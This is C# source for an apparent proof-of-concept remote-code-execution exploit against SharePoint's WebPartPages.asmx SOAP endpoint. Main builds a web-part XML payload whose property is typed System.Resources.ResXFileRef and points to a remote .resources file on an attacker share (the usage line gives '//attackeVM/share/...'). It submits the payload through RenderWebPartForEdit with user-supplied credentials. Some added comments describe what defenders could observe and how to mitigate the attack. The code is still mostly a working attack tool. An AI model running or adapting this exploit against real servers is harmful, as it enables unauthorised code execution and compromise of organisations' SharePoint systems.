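/// <summary>
/// Fetches the XML definition of a single web part through the site's
/// WebPartPages.asmx SOAP endpoint (GetWebPart2, shared storage, v3 behaviour).
/// </summary>
/// <param name="storageKey">Storage key of the web part; must parse as a <see cref="Guid"/>.</param>
/// <param name="pageUrl">URL of the page hosting the web part, passed through to GetWebPart2.</param>
/// <param name="weburl">URL of the web whose <c>_vti_bin</c> endpoint is called; trailing '/' and ' ' are trimmed.</param>
/// <returns>The web part XML, or <see cref="string.Empty"/> when the call fails for any reason.</returns>
private string GetWebPartPropertiesServiceCall(string storageKey, string pageUrl, string weburl)
{
    // Same value as before (18,000,000 ms); named so the intent is visible.
    const int timeoutMs = 18000000;
    string webPartXml = string.Empty;
    try
    {
        // The SOAP proxy is IDisposable; disposing it releases the underlying connection state.
        using (var service = new WebPartPages.WebPartPagesWebService())
        {
            // Trim like Main does so a base URL ending in '/' does not produce "//_vti_bin".
            service.Url = weburl.TrimEnd(new char[] { '/', ' ' }) + "/_vti_bin/webpartpages.asmx";
            service.Timeout = timeoutMs;
            if (IsSPOnline)
            {
                // SharePoint Online: cookie-based auth; cookieContainer is presumably filled by an earlier sign-in — confirm.
                service.CookieContainer = cookieContainer;
            }
            else
            {
                // On-premises: user/password/domain held by the enclosing class.
                service.Credentials = new System.Net.NetworkCredential(uName, pwds, domain);
            }
            // Send credentials with the first request instead of waiting for a 401 challenge.
            service.PreAuthenticate = true;
            // Actual web service call which returns the information in string format.
            webPartXml = service.GetWebPart2(pageUrl, new Guid(storageKey), Storage.Shared, SPWebServiceBehavior.Version3);
        }
    }
    catch (Exception ex)
    {
        // Best-effort: a failed lookup (bad GUID, auth, SOAP fault, timeout) is logged
        // and reported as an empty string so the caller can continue with other parts.
        WriteLine("Error in GetWebPartPropertiesServiceCall: " + pageUrl);
        WriteLine(ex.Message);
    }
    return webPartXml;
}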
/// <summary>
/// Entry point of the PoC. Reads connection arguments from the command line, builds a
/// &lt;webParts&gt; import document whose single property is declared with the type name
/// System.Resources.ResXFileRef and whose value names a remote .resources file followed by
/// System.Resources.ResourceSet, then submits it to WebPartPages.asmx via RenderWebPartForEdit
/// and prints the response.
/// </summary>
/// <param name="args">Exactly five values: BaseUrl, UserName, Password, Domain, remote path to the resource file.</param>
static void Main(string[] args)
{
    try
    {
        if (args.Length != 5)
        {
            Console.WriteLine("Please provide necessary information:");
            Console.WriteLine("SP_soap_RCE_PoC.exe <BaseUrl> <UserName> <Password> <Domain> <Remote_Path_To_Resource_File>");
            Console.WriteLine("Example: SP_soap_RCE_PoC.exe http://Sharepont2019/siteofuser2/ user2 P@ssw0rd contoso //attackeVM/share/SP_soap_RCE_PoC.RCE_Resource.resources");
            return;
        }
        string BaseURL = args[0];
        string UserName = args[1];
        // NOTE(review): the password arrives via argv and is therefore visible to anyone
        // who can list processes on the machine running this tool.
        string Password = args[2];
        string Domain = args[3];
        string RemotePath = args[4];
        // TC_Type is the type name the server is asked to resolve for the property;
        // BF_payload pairs RemotePath with ResourceSet. The usage text above gives a UNC
        // path as the example, so presumably the server opens RemotePath over SMB when it
        // resolves the reference — outbound SMB from a SharePoint front end would be the
        // matching observation on the defender's side (confirm).
        var TC_Type = "System.Resources.ResXFileRef, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089";
        var BF_payload = RemotePath + "; System.Resources.ResourceSet, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089";
        // Per-site SOAP endpoint. Authenticated POSTs to WebPartPages.asmx carrying
        // RenderWebPartForEdit (or AddWebPart) bodies with a property typed ResXFileRef are
        // the observable artefact of this tool.
        var URL = BaseURL.TrimEnd(new char[] { '/', ' ' }) + "/_vti_bin/WebPartPages.asmx";
        // The proxy is IDisposable but is not disposed here; the process exits right after.
        var service = new WebPartPages.WebPartPagesWebService { Url = URL };
        service.Credentials = new NetworkCredential(UserName, Password, Domain);
        //Our WebPart xml with payload
        string webPartXml = @"<webParts> <webPart xmlns=""http://schemas.microsoft.com/WebPart/v3""> <metaData> <type name=""Microsoft.SharePoint.Portal.WebControls.BusinessDataListWebPart, Microsoft.SharePoint.Portal,Version=12.0.0.0,Culture=neutral,PublicKeyToken=71e9bce111e9429c"" /> <importErrorMessage>Attack may be successful!</importErrorMessage> </metaData> <data> <properties> <property name=""SomeFakeProperty"" type=""" + TC_Type + @""">" + BF_payload + @"</property> </properties> </data> </webPart> </webParts>";
        //If an attacker has Add and Customize permissions to only some specific page
        //he/she can use this method with pageUrl to this page
        //var pageUrl = "/sitename/SitePages/Home.aspx";
        //WebPartPages.Storage storage = WebPartPages.Storage.Personal;
        //var result = service.AddWebPart(pageUrl, webPartXml, storage);
        // The author's note above implies RenderWebPartForEdit needs no page-specific
        // customize permission, only an authenticated user. Mitigation therefore rests on
        // the vendor fix for the web-part import path and on limiting who can reach this
        // endpoint, not on page-level permissions — confirm against the vendor's fix.
        var result = service.RenderWebPartForEdit(webPartXml);
        Console.WriteLine(result);
    }
    catch
    (Exception e)
    {
        // Catch-all: any failure (argument parsing, network, SOAP fault) is printed with the full exception.
        Console.WriteLine("{0} Exception caught. with Message {1}", e, e.Message);
    }
}